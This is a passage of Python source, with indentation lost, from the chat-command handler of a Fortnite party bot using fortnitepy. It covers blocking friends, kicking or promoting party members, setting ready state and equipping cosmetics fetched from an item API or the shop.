send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['blockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['blockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and not client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and not client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if not client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if client.is_blocked(user.id):
await reply(message, client, l('already_block'))
return
await client.block_user(user.id)
await reply(message, client, l('block_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_block_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_blocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unblockfriend']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['unblockfriend']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(user.display_name): user for user in cache_users.values() if content_ in jaconv.kata2hira(str(user.display_name).lower()) and user.id != client.user.id and client.is_blocked(user.id)}
else:
users = {str(user.display_name): user for user in cache_users.values() if content_ in str(user.display_name) and user.id != client.user.id and client.is_blocked(user.id)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.is_blocked(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
if not client.is_blocked(user.id):
await reply(message, client, l('not_block'))
return
await client.unblock_user(user.id)
await reply(message, client, l('unblock_user', f'{name(user)}'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_unblock_user')}"
await reply(message, client, text)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_unblocking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['voice']:
try:
if args[1] in commands['true']:
client.voice = True
await client.enable_voice()
send(display_name,l('set_to', 'voice', l('on')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('on')))
elif args[1] in commands['false']:
client.voice = False
await client.disable_voice()
send(display_name,l('set_to', 'voice', l('off')),add_p=lambda x:f'[{now()}] [{client.user.display_name}] {x}')
await reply(message, client, l('set_to', 'voice', l('off')))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands[key]}] [[{commands['true']}] / [{commands['false']}]]")
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
return
elif args[0] in commands['chatban']:
try:
reason = rawcontent.split(' : ')
if rawcontent == '':
await reply(message, client, f"[{commands['chatban']}] [{l('name_or_id')}] : [{l('reason')}({l('optional')})]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
try:
await member.chatban(reason[1])
except IndexError:
await member.chatban()
await reply(message, client, l('chatban_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))""" for user in users.values()
],
"variable": [
{"user": user, "reason": reason} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_chatban')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_notfound'))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_chatban'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['promote']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['promote']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.promote()
await reply(message, client, l('promote_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_promote_user')}"
await reply(message, client, text)
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('already_party_leader'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_promoting_party_leader'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['kick']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['kick']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await member.kick()
await reply(message, client, l('kick_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_kick_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.PartyError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('cant_kick_yourself'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_kicking_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['hide']:
try:
if rawcontent == '':
await client.hide()
await reply(message, client, l('hide_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.hide(member.id)
await reply(message, client, l('hide_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_hide_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['show']:
try:
if rawcontent == '':
await client.show()
await reply(message, client, l('show_all_user'))
else:
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
await client.show(member.id)
await reply(message, client, l('show_user', f'{name(user)}'))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_show_user')}"
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('not_party_leader'))
except fortnitepy.NotFound:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('user_not_in_party'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['ready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.READY)
await reply(message, client, l('set_to', l('readystate'), l('ready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unready']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.NOT_READY)
await reply(message, client, l('set_to', l('readystate'), l('unready')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['sitout']:
try:
await client.party.me.set_ready(fortnitepy.ReadyState.SITTING_OUT)
await reply(message, client, l('set_to', l('readystate'), l('sitout')))
except fortnitepy.Forbidden:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['match']:
try:
await client.party.me.set_in_match(players_left=int(args[1]) if args[1:2] else 100)
await reply(message, client, l('set_to', l('matchstate'), l('remaining', args[1] if args[1:2] else "100")))
except ValueError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('remaining_must_be_between_0_and_255'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['unmatch']:
try:
await client.party.me.clear_in_match()
await reply(message, client, l('set_to', l('matchstate'), l('off')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['swap']:
try:
if rawcontent == '':
await reply(message, client, f"[{commands['swap']}] [{l('name_or_id')}]")
return
if data['caseinsensitive']:
users = {str(member.display_name): member for member in client.party.members if content_ in jaconv.kata2hira(str(member.display_name).lower())}
else:
users = {str(member.display_name): member for member in client.party.members if content_ in str(member.display_name)}
try:
user = await client.fetch_user(rawcontent)
if user:
if client.party.get_member(user.id):
users[str(user.display_name)] = user
client.add_cache(user)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l("error_while_requesting_userinfo"))
if len(users) > search_max:
await reply(message, client, l('too_many_users', str(len(users))))
return
if len(users) == 0:
await reply(message, client, l('user_notfound'))
return
if len(users) == 1:
user = tuple(users.values())[0]
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
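# Snapshot the real squad assignments before swapping; if this client
# leads the party, patch in the visual layout and then restore the
# original assignments (the swap is presumably cosmetic only).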
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
await asyncio.sleep(2)
client.party.meta.set_squad_assignments(real_members)
else:
client.select[message.author.id] = {
"exec": [
"""\
try:
member = client.party.get_member(user.id)
if not member:
await reply(message, client, l('user_not_in_party'))
return
real_members = client.party.meta.squad_assignments
assignments = client.visual_members
await member.swap_position()
await reply(message, client, l('swap_user', f'{name(user)}'))
if client.party.me.leader:
await asyncio.sleep(0.5)
prop = client.party.meta.set_squad_assignments(assignments)
await client.party.patch(updated=prop)
client.party.meta.set_squad_assignments(real_members)
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))""" for user in users.values()
],
"variable": [
{"user": user} for user in users.values()
]
}
text = str()
for count, user in enumerate(users.values()):
text += f"\n{count+1} {name(user)}"
text += f"\n{l('enter_to_swap_user')}"
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_swapping_user'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['stop']:
try:
client.stopcheck = True
if await client.change_asset(message.author.id, "Emote", ""):
await reply(message, client, l('stopped'))
else:
await reply(message, client, l('locked'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['setenlightenment']:
try:
if await client.change_asset(message.author.id, "Outfit", client.party.me.outfit, client.party.me.outfit_variants,(args[1],args[2])) is True:
await reply(message, client, l('set_to', 'enlightenment', f'{args[1]}, {args[2]}'))
else:
await reply(message, client, l('locked'))
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except IndexError:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, f"[{commands['setenlightenment']}] [{l('number')}] [{l('number')}]")
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['addeditems']:
try:
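# Fetch the newest cosmetics from the BenBot API and equip each
# supported item in turn, pausing 5 seconds between changes.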
async with aiohttp.ClientSession() as session:
res = await session.get("https://benbotfn.tk/api/v1/newCosmetics")
res = await res.json()
flag = False
items = res["items"]
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('addeditem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['shopitems']:
try:
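# Flatten the current item shop (featured, daily and specials) into
# equippable grants, skipping backend types the bot never wears.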
store = await client.fetch_item_shop()
items = []
for item in (store.featured_items
+ store.daily_items
+ store.special_featured_items
+ store.special_daily_items):
for grant in item.grants:
if convert_backend_type(grant["type"]) in ignoretype:
continue
entry = {
"id": grant["asset"],
"type": convert_to_asset(convert_to_old_type(convert_backend_type(grant["type"]))),
"backendType": grant["type"]
}
items.append(entry)
for item in items:
if client.stopcheck:
client.stopcheck = False
break
if item["backendType"] in ignoretype:
continue
if await client.change_asset(message.author.id, convert_backend_type(item["backendType"]), item["id"]):
i = await loop.run_in_executor(None,search_item,data["search-lang"],"id",item["id"],convert_backend_type(item["backendType"]))
if i:
i = i[0]
if data['loglevel'] == 'normal':
await reply(message, client, f"{i['shortDescription']}: {i['name']}")
else:
await reply(message, client, f"{i['shortDescription']}: {i['name']} | {i['id']}")
else:
await reply(message, client, item["id"])
await asyncio.sleep(5)
else:
await reply(message, client, l('all_end', l('shopitem')))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif any(args[0] in commands[key] for key in ("alloutfit", "allbackpack", "allpet", "allpickaxe", "allemote", "allemoji", "alltoy")):
type_ = convert_to_type(args[0])
try:
if getattr(client,f"{convert_to_old_type(type_)}lock") and client.lock_check(message.author.id):
await reply(message, client, l('locked'))
return
with open(f'items/{type_}_{data["search-lang"]}.json', 'r', encoding='utf-8') as f:
allitem = json.load(f)
for item in allitem:
if client.stopcheck:
client.stopcheck = False
break
await client.change_asset(message.author.id, type_, item["id"])
await asyncio.sleep(2)
else:
await reply(message, client, l('all_end', l(convert_to_old_type(type_))))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif any(args[0] in commands[key] for key in ("cid", "bid", "petcarrier", "pickaxe_id", "eid", "emoji_id", "toy_id", "id")):
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [ID]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "id", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "id", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif any(args[0] in commands[key] for key in ("outfit", "backpack", "pet", "pickaxe", "emote", "emoji", "toy", "item")):
type_ = convert_to_type(args[0])
if rawcontent == '':
await reply(message, client, f"[{commands[convert_to_old_type(type_)]}] [{l('itemname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "name", rawcontent, type_)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "name", rawcontent, type_)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]['backendType']), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}"
text += f"\n{l('enter_to_change_asset')}"
await reply(message, client, text)
client.select[message.author.id] = {
"exec": [
"""\
if await client.change_asset(message.author.id, convert_backend_type(item['backendType']), item['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{item['shortDescription']}: {item['name']}")
else:
await reply(message, client, f"{item['shortDescription']}: {item['name']} | {item['id']}")
else:
await reply(message, client, l('locked'))""" for item in result
],
"variable": [
{"item": item} for item in result
]
}
except fortnitepy.HTTPException:
if data['loglevel'] == 'debug':
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error_while_changing_asset'))
except Exception:
send(display_name,traceback.format_exc(),red,add_d=lambda x:f'>>> {x}')
await reply(message, client, l('error'))
elif args[0] in commands['set']:
if rawcontent == '':
await reply(message, client, f"[{commands['set']}] [{l('setname')}]")
return
try:
result = await loop.run_in_executor(None, search_item, data["search-lang"], "set", rawcontent)
if result is None and data["sub-search-lang"] != data["search-lang"]:
result = await loop.run_in_executor(None, search_item, data["sub-search-lang"], "set", rawcontent)
if result is None:
await reply(message, client, l('item_notfound'))
else:
if len(result) > search_max:
await reply(message, client, l('too_many_items', str(len(result))))
return
if len(result) == 1:
if await client.change_asset(message.author.id, convert_backend_type(result[0]["backendType"]), result[0]['id']) is True:
if data['loglevel'] == 'normal':
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['set']}")
else:
await reply(message, client, f"{result[0]['shortDescription']}: {result[0]['name']} | {result[0]['id']}({result[0]['set']})")
else:
await reply(message, client, l('locked'))
else:
text = str()
for count, item in enumerate(result):
if data['loglevel'] == 'normal':
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {result[0]['set']}"
else:
text += f"\n{count+1} {item['shortDescription']}: {item['name']} | {item['id']}({result[0]['set']})"
